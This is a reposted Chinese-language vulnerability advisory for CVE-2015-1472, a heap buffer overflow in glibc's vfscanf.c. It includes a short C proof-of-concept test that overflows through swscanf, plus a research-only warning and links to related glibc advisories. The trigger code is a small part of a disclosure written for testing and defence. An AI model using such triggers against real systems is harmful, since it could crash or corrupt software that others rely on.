common/vfscanf.c'堆缓冲区溢出漏洞(CVE

发布日期:2015-02-03
更新日期:2015-02-08

受影响系统:
GNU glibc
描述:
BUGTRAQ  ID: 72498
 CVE(CAN) ID: CVE-2015-1472

glibc是GNU发布的libc库,即c运行库。glibc是linux系统中最底层的api,几乎其它任何运行库都会依赖于glibc。

glibc在stdio-common/vfscanf.c的实现上存在堆缓冲区溢出漏洞,目前影响未知。

<*来源:Joseph Myers
  *>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
int
  main (void)
  {
    wchar_t *s = malloc ((SIZE + 1) * sizeof (*s));
    if (s == NULL)
      abort ();
    for (size_t i = 0; i < SIZE; i++)
      s[i] = L'0';
    s[SIZE] = L'\0';
    int i;
    if (swscanf (s, L"%d", &i) != 1)
      abort ();
    if (i != 0)
      abort ();
    free (s);
    return 0;
  }

建议:
厂商补丁:

GNU
 ---
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

危险!GHOST(幽灵)漏洞曝光 

GNU glibc 爆 gethostbyname 缓冲区溢出漏洞 

glibc gethostbyname缓冲区溢出漏洞(CVE-2015-0235) 

Linux glibc幽灵漏洞测试与修复方法

Glibc 的详细介绍请点这里
Glibc 的下载地址请点这里

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:http://www.heiqu.com/0ffca2817adc6afab29c434b1b032a2c.html